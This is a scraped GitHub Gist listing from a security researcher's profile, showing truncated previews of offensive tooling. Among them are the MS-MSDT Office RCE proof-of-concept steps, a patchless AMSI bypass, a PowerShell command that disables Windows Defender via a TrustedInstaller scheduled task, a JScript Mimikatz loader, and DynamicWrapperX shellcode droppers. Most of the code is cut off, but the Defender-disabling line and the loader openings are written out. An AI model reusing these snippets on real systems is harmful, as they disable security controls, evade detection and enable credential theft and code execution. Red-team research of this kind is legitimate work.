Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
Wanna sip a sencha?

Mariusz Banach mgeeky

💭
Wanna sip a sencha?
View GitHub Profile
@mgeeky
mgeeky / TlsCallback.cpp
Created Jun 14, 2022
TLS Callbacks demo in Windows GUI application, to be compiled with MSVC++. Originally authored by Elias Bachaalany, source: http://lallouslab.net/2017/05/30/using-cc-tls-callbacks-in-visual-studio-with-your-32-or-64bits-programs/
View TlsCallback.cpp
#define WIN32_LEAN_AND_MEAN
#include <iostream>
#include <windows.h>
VOID WINAPI TlsCallback1(PVOID DllHandle, DWORD Reason, PVOID Reserved)
{
if (Reason == DLL_PROCESS_ATTACH)
{
MessageBoxA(NULL, "Hello from TlsCallback1", "TlsCallback1", 0);
@mgeeky
mgeeky / ms-msdt.MD
Created May 31, 2022 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
View ms-msdt.MD

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@mgeeky
mgeeky / README.md
Created May 20, 2022
Call WinAPI dynamically from VBA using oleaut32.DispCallFunc to minimize number of Declare PtrSafe import statements
View README.md

Synopsis

This PoC is currently not working properly.

The PoC demonstrates how to dynamically call WinAPI imported functions from VBA using oleaut32!DispCallFunc(...).

The idea is to get rid of most of the Private Declare PtrSafe Function SomeFunction Lib "kernel32.dll" Alias "Sleep" ( ... ) statements, revealing intent of a dodgy VBA code.

From the offensive perspective we'd prefer to have the least amount of WinAPI import statements in our VBA to lower detection rate on the security aware scanners.

@mgeeky
mgeeky / patchless_amsi.h
Created May 12, 2022 — forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
View patchless_amsi.h
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@mgeeky
mgeeky / doh.ps1
Created Feb 17, 2022 — forked from tyranid/doh.ps1
Something or other.
View doh.ps1
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@mgeeky
mgeeky / OlderCode.js
Created Feb 12, 2022
Mimikatz in JS Oneliner
View OlderCode.js
This file has been truncated, but you can view the full file.
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
try {
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="AllTheThings" version="0.0.0.0"/> <file name="katz.dll"> <comClass description="AllTheThings Class" clsid="{89565276-A714-4a43-912E-978BFEEDACDC}" threadingModel="Both" progid="AllTheThings"/> </file> </assembly>';
var ax = new ActiveXObject("Microsoft.Windows.ActCtx");
ax.ManifestText = manifest;
// Create Base64 Object, supports encode, decode
@mgeeky
mgeeky / AllTheThings.cs
Created Feb 11, 2022
DynWrapit - Arbitrary .NET load Any Assembly from configurable path
View AllTheThings.cs
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
public class Program
{
public static void Main()
{
View honeybadger.hta
<html>
<img id="HoneyBadger" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABAAAAAKtCAIAAAA2LYveAAAACXBIWXMAAA7zAAAO8wEcU5k6AAAAEXRFWHRUaXRsZQBQREYgQ3JlYXRvckFevCgAAAATdEVYdEF1dGhvcgBQREYgVG9vbHMgQUcbz3cwAAAALXpUWHREZXNjcmlwdGlvbgAACJnLKCkpsNLXLy8v1ytISdMtyc/PKdZLzs8FAG6fCPGXryy4AAovrklEQVR42ty9i5bjSJIsFgGAZGZWVnX1vFa60tmj/z/6CR19ymp1R3dmerrrkZl8ACFztwiH40kwM6tnJW5PLZMEgXghYO5ubh7/z//jfw8hxOELn1RVFeZedZBvU0r2iX8/ffFs09fSr6qY1o+fXLqz9/yK/3ZdZ+8H/3Yn+9NeK5eIYTfbWfbLfm7dvHQt39tI2ldx8uL5l8Z/cFg5Cfu1MBRz81Kt9W7uPNG3x/d0dl7asDb76/M4bfP0yLbM49Jho3a2C+ttaR0uvTDO/if9RLcd3nT6Gk3c7Hl27vM4eT9dnzzlaApWzhAXzs8/67qu9GVfHbt73Nl1HSv8l7q2O3btpW3P6A5WirShi2WkZQdomtPsDdK27agB/PZY53VbxUav3OjVK/7ZNHv8o8s+H3Zpa54BDcA5bXnjYH9z8b1OyvPlcsF7fti2id3UraPe6atpGn6FI4/P3/EnD8D5tUfywq9affFU1oUmHvNC0hdbUsurmV9XOhQ8Unpdc6m0bD+6Jf/Grp/xC4elYpfxwsHlXN1wPejnqSlLBWfBDFW4QVOsOu7DEbPI3kXsPDjb8dxyQPDv+Xw+nS7YsXe7g05nbJrdfr9v6n3u/uXy9PKNS/3u7u5wOKCvGDR88/z8HEOtUyYvncQaDau6c3kSVFxdsmGkqk3dk77w+ePj44cPH5qd7JzpdNQ+5hfOjFbhX1xOxrSRUcUnuNzxeMSlcSg+5ySi
@mgeeky
mgeeky / dynwrapx.js
Created Feb 11, 2022
DynamicWrapperX Dropper - Code Registration Example
View dynwrapx.js
//Example Reference:
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
var fso = new ActiveXObject("Scripting.FileSystemObject");
var dropPath = fso.GetSpecialFolder(2);
// Create Base64 Object, supports encode, decode
var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.charac
@mgeeky
mgeeky / roadrunner.js
Created Feb 11, 2022 — forked from slyd0g/roadrunner.js
RoadRunner - Register Shellcode HexBytes in JScript and Execute. - DynamicWrapperX
View roadrunner.js
try {
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Users\\Public';
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll.blg"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
// Create Base64 Object, supports encode, decode
//Magic is just a cool way to decode to byte array ;
function Magic(r){if(!/^[a-z0-9+/]+={0,2}$/i.test(r)||r.length%4!=0)throw Error("Not base64 string");for(var t,e,n,o,i,a,f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",h=[],d=0;d<r.length;d+=4)t=(a=f.indexOf(r.charAt(d))<<18|f.indexOf(r.charAt(d+1))<<12|(o=f.indexOf(r.charAt(d+2)))<<6|(i=f.indexOf(r.charAt(d+3))))>>>16&255,e=a>>>